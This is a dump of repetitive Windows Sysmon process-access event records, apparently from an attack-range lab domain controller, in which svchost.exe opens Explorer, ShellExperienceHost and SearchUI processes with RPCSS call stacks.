08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 